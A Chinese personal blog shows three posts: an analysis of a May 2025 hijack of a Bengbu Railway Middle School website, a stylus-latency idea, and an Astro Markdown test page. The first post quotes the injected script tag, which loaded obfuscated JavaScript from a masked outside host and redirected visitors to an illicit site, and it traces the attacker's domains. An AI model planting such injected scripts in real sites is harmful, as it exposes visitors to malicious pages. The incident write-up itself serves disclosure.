RzdBlog

蚌埠铁路中学官网被攻击事件分析

Tue, 13 May 2025 00:00:00 GMT

蚌埠铁路中学官网被攻击事件分析

5月12日中午，蚌埠铁路中学官方出现了一件离谱的事。从微信“蚌埠铁路中学”公众号进入铁中官网，会进入不良网站。直到下午一点，网站才关闭。从浏览器打开是这样的：

但是解析到的 ip 是 60.170.253.4，确实是铁中。

从浏览器直接访问蚌埠铁路中学官方依旧是 https://www.bbtlzx.com，而微信打开的是 http://www.bbtlzx.com/index.aspx，问题就出在这个后缀上。不仅是 index.aspx 和 index.html，只要链接后面带上任意路径，都会打开不良网站，铁中官网真的被攻击了。

查看一下 html，就一行：

<script src="https://tz.[马赛克].com/nn.js"></script>

把这个脚本下载下来，里面的代码经过混淆，唯一正常的地方是判断 UA。但是这个脚本用脚趾头想都知道是干什么的——它会打开一个新的页面。

经过一番操作（我知道大家不想看具体流程），我们得到了这三个链接和几个标签（LINK，STYLE，SCRIPT，IFRAME，DIV）：

https://hm.baidu.com/
https://hm.baidu.com/hm.js?333b84ee83b6ca1f3b6184a73cc31e7f
https://bz5122.[马赛克].com/2024/mm/nn.html

（它甚至用了百度统计）

接着重头戏来了：ping 一下，发现解析到的 ip 全是国内 ip，也就是说这个域名有备案。去工信部查一下，沪ICP备2024095047号，上海蒂芬分网络科技。

那么有人可能又要说了，会不会是二级备案域名分发或者是备案域名忘续费了之类的？但是企业注册时间是 24 年 8 月 8 日，而域名注册时间是 24 年 8 月 30 日（28 年 8 月 30 日到期），很明显没有中断过。

接着是第二个——这个域名的 NS 记录是华为云。而且不仅仅是这么简单。查一下 DNS 记录可知，除了 NS 记录外，还有一个 SOA 记录，两个 A 记录和 6 个 CNAME 记录（6 个子域）。那两个 A 记录能通的 ip 就一个，113.45.12.80，是华为云。而且那六个 CNAME 到的域名的主域是 cdnhwcpsd13.com，黔ICP备20004760号-27，华为云的 CDN。

正常能在国内访问的，大多是一个便宜/监管宽松的域名 + 境外服务器，并且非常小心翼翼。这倒好，国内服务器 + 备案域名，而且攻击公立学校的官网。

至于公司……一个已经注销的注册资金 10w 的空壳公司。

但是这里有个问题，既然公司已经注销，为什么不把备案注销了？而且从域名时间可以看出，中间并没有过到期，现在也还是正常状态，别人是改不了 DNS 记录的。

其它

它的 6 个子域中，fa6133、bz5122、ha1366、xa1455 可以通过 2024/mm/nn.html 这个目录打开不良网站，只有站点名称和图标等细微差别。而且 fa6133 和 bz5122 共用一个证书，ha1366 和 xa1455 共用一个证书。还有剩下两个子域 xj2199 和 ttk112，虽然打不开，但前面的一些静态资源又存在上面，而且这两个页面之间也不一样。

还有一个凑巧的事：碰巧发现的 http://fa6133.[马赛克].com/index.css

一种优化手写笔书写延迟的方案

Sun, 07 Sep 2025 00:00:00 GMT

目前平板手写笔或多或少存在一些延迟。星闪虽说能做到零延迟，但对于手写笔这类设备来说，只能使用低功耗版本，依旧存在一定延迟。而电容笔也同样具有较为明显的延迟问题。

不妨换个思路：将手写笔的笔头进行改造，使其类似于被动式电容笔的结构。随后，平板端的任务转变为准确识别哪一个触控点来自于手写笔，优先解决延迟问题，再结合倾斜角等附加信息进行笔画绘制（在非绘图类软件中，甚至可暂时降低功耗以提升续航）。

该方案的优势在于，手写笔本身只需做出较小改动，同时主要调整也集中在触控算法的优化上，实现成本相对较低。

测试文章

Fri, 05 Sep 2025 00:00:00 GMT

这里是一些在 Astro 中编写 Markdown 内容时可使用的基本 Markdown 语法示例。

标题

以下 HTML <h1>—<h6> 元素代表了六个级别的章节标题。<h1> 是最高章节级别，而 <h6> 是最低的。

H1

H2

H3

H4

H5

H6

图片

语法

![替代文本](./完整或相对路径的图片)

输出

块引用

块引用元素代表引自其他来源的内容，可以选择性地包含一个必须位于 footer 或 cite 元素内的引用，并且可以选择性地包含内联更改，例如注释和缩写。

无归属的块引用

语法

> Tiam, ad mint andaepu dandae nostion secatur sequo quae.
> **注意**，你可以在块引用中使用 _Markdown 语法_。

输出

Tiam, ad mint andaepu dandae nostion secatur sequo quae. 注意，你可以在块引用中使用 Markdown 语法。

带归属的块引用

语法

> 不要通过共享内存来通信，而要通过通信来共享内存。<br>
> — <cite>罗布·派克[^1]</cite>

输出

不要通过共享内存来通信，而要通过通信来共享内存。<br> — <cite>罗布·派克[^1]</cite>

[^1]: 以上引用摘自罗布·派克（Rob Pike）在 2015 年 11 月 18 日 Gopherfest 期间的谈话。

表格

语法

| 斜体      | 粗体       | 代码      |
| --------- | ---------- | --------- |
| _斜体_    | **粗体**   | `代码`    |

输出

斜体	粗体	代码
斜体	粗体	`代码`

代码块

语法

我们可以使用 3 个反引号 ``` 在新的一行开始，编写代码片段，并在新的一行用 3 个反引号结束。若要高亮特定语言的语法，可以在开头的 3 个反引号后写上语言名称，例如 html、javascript、css、markdown、typescript、txt、bash。

```c
float Q_rsqrt( float number )
{
    long i;
    float x2, y;
    const float threehalfs = 1.5F;

    x2 = number * 0.5F;
    y  = number;
    i  = * ( long * ) &y;                       // evil floating point bit level hacking
    i  = 0x5f3759df - ( i >> 1 );               // what the fuck?
    y  = * ( float * ) &i;
    y  = y * ( threehalfs - ( x2 * y * y ) );   // 1st iteration
//    y  = y * ( threehalfs - ( x2 * y * y ) );   // 2nd iteration, this can be removed

    return y;
}
```

输出

float Q_rsqrt( float number )
{
    long i;
    float x2, y;
    const float threehalfs = 1.5F;

    x2 = number * 0.5F;
    y  = number;
    i  = * ( long * ) &y;                       // evil floating point bit level hacking
    i  = 0x5f3759df - ( i >> 1 );               // what the fuck?
    y  = * ( float * ) &i;
    y  = y * ( threehalfs - ( x2 * y * y ) );   // 1st iteration
//    y  = y * ( threehalfs - ( x2 * y * y ) );   // 2nd iteration, this can be removed

    return y;
}

Mermaid 图表

Mermaid 是一个基于 JavaScript 的图表绘制工具，它使用 Markdown 风格的语法来创建各种图表。许多支持 Markdown 的平台（如 Astro、GitHub、Obsidian 等）都集成了 Mermaid，可以直接渲染。

语法

使用三个反引号代码块，并将语言标记为 mermaid。

```mermaid
// 你的 Mermaid 语法在这里
graph TD;
    A[开始] --> B{判断};
    B -->|是| C[执行操作];
    B -->|否| D[结束];
    C --> D;
```

示例：流程图 (Flowchart)

```mermaid
graph LR
    A[方形] --> B(圆角方形)
    B --> C{条件}
    C -->|选项1| D[结果一]
    C -->|选项2| E[结果二]
    F[\非标准形状/] --> D
```

输出

graph LR
    A[方形] --> B(圆角方形)
    B --> C{条件}
    C -->|选项1| D[结果一]
    C -->|选项2| E[结果二]
    F[\非标准形状/] --> D

示例：序列图 (Sequence Diagram)

```mermaid
sequenceDiagram
    参与者 Alice->>John: 你好 John，最近怎么样？
    John-->>Alice: 很好！
    Alice->>John: 你确定？
    Note right of John: John 想了想<br/>他很好
    John-->>Alice: 当然！
    Alice->>John: 好的！
```

输出

sequenceDiagram
    参与者 Alice->>John: 你好 John，最近怎么样？
    John-->>Alice: 很好！
    Alice->>John: 你确定？
    Note right of John: John 想了想<br/>他很好
    John-->>Alice: 当然！
    Alice->>John: 好的！

列表类型

有序列表

语法

1. 第一项
2. 第二项
3. 第三项

输出

第一项
第二项
第三项

无序列表

语法

- 列表项
- 另一个项
- 还有一个项

输出

列表项
另一个项
还有一个项

嵌套列表

语法

- 水果
  - 苹果
  - 橙子
  - 香蕉
- 奶制品
  - 牛奶
  - 奶酪

输出

水果
- 苹果
- 橙子
- 香蕉
奶制品
- 牛奶
- 奶酪